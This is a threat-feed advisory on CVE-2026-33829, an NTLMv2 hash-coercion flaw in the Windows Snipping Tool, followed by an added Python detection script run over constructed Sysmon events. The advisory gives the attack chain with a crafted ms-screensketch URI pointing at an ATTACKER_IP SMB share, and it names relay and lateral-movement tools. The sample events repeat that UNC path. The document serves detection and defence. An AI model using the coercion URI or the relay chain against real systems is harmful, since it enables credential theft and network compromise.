{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/cpes/cpe2.3omicrosoftwindows_11_25h2arm64/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":["cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*","cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*","cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:*","cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x86:*","cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:arm64:*","cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x86:*","cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:arm64:*","cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:*","cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:*","cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:arm64:*","cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*","cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"],"_cs_cves":[{"cvss":4.3,"id":"CVE-2026-33829"}],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Windows Snipping Tool"],"_cs_severities":["medium"],"_cs_tags":["credential-access","ntlmv2","pass-the-hash","cve-2026-33829"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eA public exploit (EDB-52567) has been published detailing an NTLMv2 Hash Hijack vulnerability (CVE-2026-33829) within the Windows Snipping Tool. 
This vulnerability allows an attacker to force a victim system to authenticate to a remote SMB server under the attacker\u0026rsquo;s control. The exploit leverages a specially crafted \u003ccode\u003ems-screensketch:edit\u003c/code\u003e URI whose \u003ccode\u003efilePath\u003c/code\u003e parameter is a UNC path on an attacker-controlled host. When a user clicks a malicious link and approves the \u0026ldquo;Open Snipping Tool\u0026rdquo; prompt, Windows resolves that path and authenticates to the attacker\u0026rsquo;s SMB server with NTLM, handing over a Net-NTLMv2 challenge/response (the \u0026ldquo;NTLMv2 hash\u0026rdquo; referred to below). The published exploit extends beyond the original vector by also running LLMNR and mDNS poisoning together with a rogue WPAD proxy to harvest HTTP NTLM responses, potentially capturing multiple valid responses from a single user interaction; those poisoning techniques only reach victims on the attacker\u0026rsquo;s local network segment, whereas the URI vector works against any victim that can reach the attacker\u0026rsquo;s SMB server. The affected systems include Windows 10, Windows 11, and Windows Server versions 2012 through 2025 (prior to the April 14, 2026 patch).\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker sets up a malicious SMB server and Responder on Kali Linux.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious HTML page containing an \u003ccode\u003ems-screensketch:edit\u003c/code\u003e URI pointing to the attacker\u0026rsquo;s SMB server: \u003ccode\u003ems-screensketch:edit?filePath=\\\\\u0026lt;ATTACKER_IP\u0026gt;\\test\\evil.png\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker hosts the malicious HTML page on an HTTP server.\u003c/li\u003e\n\u003cli\u003eThe victim browses to the malicious page and clicks a link or button that triggers the \u003ccode\u003ems-screensketch:edit\u003c/code\u003e URI.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s system prompts them to \u0026ldquo;Open Snipping Tool\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eIf the user approves the prompt, Windows attempts to authenticate to the attacker\u0026rsquo;s SMB server using NTLMv2.\u003c/li\u003e\n\u003cli\u003eResponder captures the Net-NTLMv2 challenge/response from the authentication attempt.\u003c/li\u003e\n\u003cli\u003eThe captured response cannot be replayed directly as a Pass-the-Hash credential (that requires the NT hash itself); the attacker either cracks it offline to recover the password or relays the live authentication with an NTLM relay tool such as \u003ccode\u003eimpacket-ntlmrelayx\u003c/code\u003e to a host that does not enforce SMB signing, and then uses the resulting credential with tools like \u003ccode\u003eimpacket-psexec\u003c/code\u003e to gain unauthorized access to other systems on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-33829 allows an attacker to capture a user\u0026rsquo;s Net-NTLMv2 challenge/response. Once cracked offline or relayed, that credential enables lateral movement and can lead to domain compromise. While the CVSS score is rated as Medium (4.3), the impact in practice can be High, as credential theft can lead to significant data breaches and system compromise. The number of potential victims is broad, encompassing any unpatched Windows 10, 11, or Server system.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the Microsoft patch released on April 14, 2026, to remediate CVE-2026-33829.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u0026ldquo;Detect Snipping Tool NTLMv2 Hash Hijack Attempt via URI\u0026rdquo; to detect attempts to exploit this vulnerability.\u003c/li\u003e\n\u003cli\u003eBlock outbound SMB traffic (TCP port 445) at the network perimeter so the coerced authentication never reaches an Internet-hosted attacker. This does not stop an attacker on the local network, and it does nothing against the LLMNR/mDNS/WPAD vector, so also disable LLMNR, mDNS and WPAD auto-discovery via Group Policy or registry where they are not needed.\u003c/li\u003e\n\u003cli\u003eDisable NTLMv1 if it is still allowed, audit and restrict outgoing NTLM via Group Policy (\u0026ldquo;Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers\u0026rdquo;), and enforce SMB signing so a relayed authentication is rejected.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of approving \u0026ldquo;Open Snipping Tool\u0026rdquo; prompts from untrusted sources.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-15T14:50:44Z","date_published":"2026-05-15T14:50:44Z","id":"https://feed.craftedsignal.io/briefs/2026-05-snipping-tool-ntlm-hijack/","summary":"A local exploit has been published for Windows Snipping Tool (CVE-2026-33829), enabling NTLMv2 Hash Hijacking by forcing authentication to a remote SMB server via a crafted ms-screensketch:edit URI, potentially leading to credential theft and lateral movement.","title":"Windows Snipping Tool 
NTLMv2 Hash Hijack Vulnerability (CVE-2026-33829)","url":"https://feed.craftedsignal.io/briefs/2026-05-snipping-tool-ntlm-hijack/"}],"language":"en","title":"CraftedSignal Threat Feed — Cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:*","version":"https://jsonfeed.org/version/1.1"}
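Added detection example for the brief above; this is not code from the feed and not the Sigma rule it references. It scans Sysmon-style process-creation events for Snipping Tool launches whose ms-screensketch:edit filePath names a remote UNC host, and separates those from local paths and from an allow-listed file server. Assumptions: the activated SnippingTool.exe carries the URI on its command line (as the rule name "via URI" implies; adapt the field lookups if your telemetry stores it elsewhere), field names follow Sysmon Event ID 1, the allow-list host fileserver01.corp.example is hypothetical, and the sample events (including the package directory name and the documentation address 203.0.113.7) are constructed.

```python
"""Detection logic for the CVE-2026-33829 coercion pattern: a Snipping Tool launch whose
ms-screensketch:edit URI names a file on a remote host. Added example run over constructed
Sysmon-style process-creation events; it is not the feed's Sigma rule."""
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import parse_qs

# Assumed allow-list: file servers users legitimately open screenshots from (hypothetical).
TRUSTED_SHARE_HOSTS = {"fileserver01.corp.example"}

# The URI as it would appear in a command line; stop at whitespace or a closing quote.
URI_RE = re.compile(r"ms-screensketch:edit\?([^\s\"']+)", re.IGNORECASE)
# \\host\share\... (or //host/share/...): the first path component is the server.
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)[\\/]")


@dataclass
class Finding:
    record_id: int
    parent_image: str
    uri: str
    target_host: Optional[str]
    verdict: str  # "local", "trusted-share" or "coercion"


def target_host(uri_query: str) -> Optional[str]:
    """Return the server named by filePath, or None when the path is local (or absent)."""
    params = {k.lower(): v for k, v in parse_qs(uri_query, keep_blank_values=True).items()}
    values = params.get("filepath")
    if not values:
        return None
    m = UNC_RE.match(values[0].strip())
    return m.group(1).lower() if m else None


def verdict_for(host: Optional[str]) -> str:
    """Local paths are benign, a known file server is merely noted, anything else is coercion."""
    if host is None:
        return "local"
    if host in TRUSTED_SHARE_HOSTS:
        return "trusted-share"
    return "coercion"


def scan(events: list) -> list:
    """One Finding per ms-screensketch:edit URI found in a SnippingTool.exe command line."""
    findings = []
    for ev in events:
        if not ev.get("Image", "").lower().endswith("\\snippingtool.exe"):
            continue
        for m in URI_RE.finditer(ev.get("CommandLine", "")):
            host = target_host(m.group(1))
            findings.append(Finding(ev["RecordId"], ev.get("ParentImage", ""),
                                    m.group(0), host, verdict_for(host)))
    return findings


def coercion_alerts(events: list) -> list:
    """Only the findings worth paging on: a UNC filePath to a host outside the allow-list."""
    return [f for f in scan(events) if f.verdict == "coercion"]


# Constructed sample events. Field names follow Sysmon Event ID 1; every value is made up,
# including the package directory name, which differs per Windows build.
SNIP = r"C:\Program Files\WindowsApps\Microsoft.ScreenSketch_example\SnippingTool.exe"
SAMPLE_EVENTS = [
    {"RecordId": 101, "Image": SNIP, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{SNIP}" "ms-screensketch:edit?filePath=C:\\Users\\alice\\Pictures\\shot.png"'},
    {"RecordId": 102, "Image": SNIP, "ParentImage": r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": f'"{SNIP}" "ms-screensketch:edit?filePath=\\\\203.0.113.7\\test\\evil.png"'},
    {"RecordId": 103, "Image": SNIP, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{SNIP}" "ms-screensketch:edit?filePath=\\\\fileserver01.corp.example\\scans\\page1.png"'},
    {"RecordId": 104, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" \\203.0.113.7\test\notes.txt'},
    {"RecordId": 105, "Image": SNIP, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{SNIP}"'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"record {f.record_id}: {f.verdict:<14} host={f.target_host} parent={f.parent_image}")
```

Run as-is it prints three findings and the only coercion verdict is record 102, a browser-spawned launch pointing at an outside host, which is the shape of the attack chain above. The three-way verdict exists so a SIEM can tune the allow-list without silencing the rule; the notepad event shows that a UNC path alone is not the signal, the Snipping Tool URI is.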